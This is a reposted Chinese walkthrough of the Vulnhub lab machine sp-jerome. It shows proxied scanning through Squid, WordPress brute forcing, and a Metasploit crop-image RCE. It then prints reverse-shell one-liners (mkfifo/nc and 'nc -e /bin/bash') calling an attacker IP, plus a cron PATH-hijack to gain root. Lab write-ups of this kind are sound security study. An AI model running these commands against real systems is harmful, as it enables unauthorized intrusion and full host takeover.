【甄选靶场】Vulnhub百个项目渗透——项目五十六:sp-jerome(squid代理,计划任务)

这篇具有很好参考价值的文章主要介绍了【甄选靶场】Vulnhub百个项目渗透——项目五十六:sp-jerome(squid代理,计划任务)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

Vulnhub百个项目渗透

Vulnhub百个项目渗透——项目五十六:sp-jerome(文件上传,缓冲区溢出)


🔥系列专栏:Vulnhub百个项目渗透
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2023年1月20日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!


前言

本文章仅用作实验学习,实验环境均为自行搭建的公开vuinhub靶场,仅使用kali虚拟机作为操作学习工具。本文仅用作学习记录,不做任何导向。请勿在现实环境中模仿,操作。


信息收集

└─# nmap -p- --min-rate 10000 -A 192.168.247.148

8080/tcp open  http-proxy Squid http proxy 3.5.27
|_http-title: ERROR: The requested URL could not be retrieved
|_http-server-header: squid/3.5.27

发现了只有这个,这是一个代理软件,这说明我们的目标是是一个代理服务器,在一些普通的目标中这并不是特别重要,但是这里只有他一个,所以我会着重的搞一下

squid/3.5.27

可以看到,什么也看不到
【甄选靶场】Vulnhub百个项目渗透——项目五十六:sp-jerome(squid代理,计划任务)我们首先挂着代理去nmap一下,修改proxychains4的配置文件,这里代理设置是http 192.168.247.148 1337

proxychains4 -q nmap -sT -sV -p- 127.0.0.1

【甄选靶场】Vulnhub百个项目渗透——项目五十六:sp-jerome(squid代理,计划任务)发现了多了80和1337两个端口
我将带着代理进行一下目录爆破
使用dirbuster
按照下图所示进行设置
注意,在我们进攻代理服务器时,一般目标都是127.0.0.1了,这个不要搞错了

【甄选靶场】Vulnhub百个项目渗透——项目五十六:sp-jerome(squid代理,计划任务)
【甄选靶场】Vulnhub百个项目渗透——项目五十六:sp-jerome(squid代理,计划任务)设置好字典直接开扫,这里目标是1337端口,发现了wp站点
【甄选靶场】Vulnhub百个项目渗透——项目五十六:sp-jerome(squid代理,计划任务)
我们去访问一下,在浏览器代理插件中设置如下

【甄选靶场】Vulnhub百个项目渗透——项目五十六:sp-jerome(squid代理,计划任务)确实是一个wp站点

【甄选靶场】Vulnhub百个项目渗透——项目五十六:sp-jerome(squid代理,计划任务)

wpscan

既然是wp站点,那就用wpscan是最好用的,发现了两个用户

wpscan --url http://127.0.0.1:1337/wordpress/ --wp-content-dir wp-content/ -e u --no-banner --proxy http://192.168.247.148:8080

【甄选靶场】Vulnhub百个项目渗透——项目五十六:sp-jerome(squid代理,计划任务)

爆破一下密码

wpscan --url http://127.0.0.1:1337/wordpress/ --wp-content-dir wp-content/ --proxy http://192.168.247.148:8080 --no-banner -U jerome -P /usr/share/wordlists/rockyou.txt

【甄选靶场】Vulnhub百个项目渗透——项目五十六:sp-jerome(squid代理,计划任务)得到密码

jerome: jerome

但是不能按照以前的那种直接修改php文件来做,因为没这些功能,回过头再看有没有其他有效的,发现了可能是版本的什么东西

【甄选靶场】Vulnhub百个项目渗透——项目五十六:sp-jerome(squid代理,计划任务)

msf攻击

打开msf

search 2019-8942

【甄选靶场】Vulnhub百个项目渗透——项目五十六:sp-jerome(squid代理,计划任务)


use exploit/multi/http/wp_crop_rce
set PASSWORD jerome
set Proxies http:192.168.253.241:8080
set RPORT 1337
set RHOSTS 127.0.0.1
set TARGETURI /wordpress
set USERNAME jerome
set ReverseAllowProxy true
run
shell

【甄选靶场】Vulnhub百个项目渗透——项目五十六:sp-jerome(squid代理,计划任务)
因为我不是特别习惯在msf中利用shell,所以我会反弹出来一个新的

nc -vlp 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.247.130 1234 >/tmp/f
python3 -c 'import pty; pty.spawn("/bin/bash")'

【甄选靶场】Vulnhub百个项目渗透——项目五十六:sp-jerome(squid代理,计划任务)

cat /etc/crontab

发现root运行的计划任务
【甄选靶场】Vulnhub百个项目渗透——项目五十六:sp-jerome(squid代理,计划任务)查看一下权限以及脚本是个什么内容

【甄选靶场】Vulnhub百个项目渗透——项目五十六:sp-jerome(squid代理,计划任务)

cat /usr/share/simulate.sh

因为ls的不安全调用,所以我们可以挟持他,修改他,同时我认为也可以在/tmp目录下创建一个ls,并且将bash命令时入其中,而后增加临时环境变量,有兴趣的可以尝试一下

【甄选靶场】Vulnhub百个项目渗透——项目五十六:sp-jerome(squid代理,计划任务)我们这里直接修改ls

echo "nc -e /bin/bash 192.168.247.130 6666" >> ls
chmod +x ls

然后我们本地的监听过了好一会收到了root终端文章来源地址https://www.toymoban.com/news/detail-427839.html

到了这里,关于【甄选靶场】Vulnhub百个项目渗透——项目五十六:sp-jerome(squid代理,计划任务)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Vulnhub靶机渗透之新手入门 JIS-CTF入门靶场-学习笔记

    目录 学习前言 准备工作 一、寻找目标主机(信息收集) 二、敏感文件 三、Getshell上传木马 用蚁剑进行Getshell 四、寻找Linux密码进行ssh连接 五、连接SSH最后一步 六、总结 vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去

    2024年02月14日
    浏览(41)
  • 内网渗透思路学习——靶场实战——暗月项目七

    #免责声明: 本文属于个人笔记,仅用于学习,禁止使用于任何违法行为,任何违法行为与本人无关。 靶场地址: https://pan.baidu.com/s/12pSYxSU-ZmurQ9–GFiaXQ 提取码: 3p47 项目七靶场渗透最终目的:获得域控中的flag.txt文件中的内容 项目七靶场环境是用 VMware Workstation 搭建,把环境

    2023年04月10日
    浏览(43)
  • 2-Lampiao百个靶机渗透(精写-思路为主)框架漏洞利用2

    特别注明:本文章只用于学习交流,不可用来从事违法犯罪活动,如使用者用来从事违法犯罪行为,一切与作者无关。 前言: 我们上个笔记是常规收集可用信息,爆破拿到ssh账户提权得到root的shell 这次我们用框架来尝试两种不同方法拿到shell 思路清晰,先说步骤 1.信息收集

    2024年02月02日
    浏览(54)
  • vulnhub靶场实战系列(一)之vulnhub靶场介绍

    Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行。每个镜像会有破解的目标,大多是Boot2root,从启动虚机到获取操作系统的root权限和查看flag。 我们在学

    2024年02月10日
    浏览(40)
  • vulnhub DC-5靶场

    目录 1.信息收集 2.网站分析 3.漏洞利用 4.提升权限 扫描主机 sudo arp-scan -l 扫描端口 nmap -p- 192.168.42.149 扫描指纹 whatweb 192.168.42.149 查看端口详细服务 nmap -A -p- -v 192.168.42.149 扫描目录 dirbuster 浏览网站,发现都是静态页面 只有contact.php有上传窗口 尝试上传,发现问题copyright旁的

    2024年02月05日
    浏览(39)
  • 【VulnHub靶场】——CHRONOS: 1

    作者名:Demo不是emo  主页面链接 : 主页传送门 创作初心: 一切为了她 座右铭: 不要让时代的悲哀成为你的悲哀 专研方向: 网络安全,数据结构 每日emo: 要做个明亮的人,要有个珍藏的故事,要看遍山河日落,要不虚此行。  从10月中旬开始制定了 为期24周的打靶训练

    2024年02月09日
    浏览(35)
  • vulnhub DC-4靶场

    目录 1.信息收集 2.漏洞利用 3.横向渗透 4.提升权限 搜索到ip sudo arp-scan -l 查看ip开放端口 nmap -p- 192.168.42.148 查找指纹,没有收获 查找目录,无敏感信息 访问网站,发现只有登录框,猜测为弱密码或密码爆破 bp爆破成功(为了节省时间,我假设知道username,爆破真的太慢了)

    2024年02月05日
    浏览(89)
  • vulnhub DC-9靶场

    目录 1.信息收集 2.漏洞发掘 3.横向渗透 4.提升权限 4.1构造用户行,写入/etc/passwd 4.2构造权限行,写入/etc/sudoers 扫描主机 sudo arp-scan -l 扫描端口,发现只有80端口 nmap -p- 192.168.42.150 扫描80开放的服务 nmap -p 80 -A -V 192.168.42.150 访问主页面 发现有查找功能,猜测此处有sql注入漏洞 测

    2024年02月05日
    浏览(36)
  • breach-1--vulnhub靶场

    一、环境搭建 下载靶场Breach: 1 ~ VulnHub 描述 VM 配置了静态 IP 地址 (192.168.110.140),因此需要将仅主机适配器配置到此子网。 网络设置也可用其他模式 网络模式:NAT 靶机地址: 192.168.110.140 kali地址:192.168.110.128 二、信息收集 (1)nmap 端口扫描 所有端口都开放,应该是对扫

    2024年02月15日
    浏览(43)
  • vulnhub DC-1靶场

    目录 1.扫描主机 2.得到shell(2.1,2.2)只用一种即可 2.1开始msf漏洞利用 2.2脚本exp得到反弹shell 3.开始提权 sudo arp-scan -l 扫描端口 nmap -p- 192.168.42.147 扫描主机指纹,发现Drupal 7 cms mfconsole search drupal search 7600 use exploit/unix/webapp/drupal_drupalgeddon2 set rhosts 192.168.42.147 run 看到这个,说

    2024年02月05日
    浏览(44)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包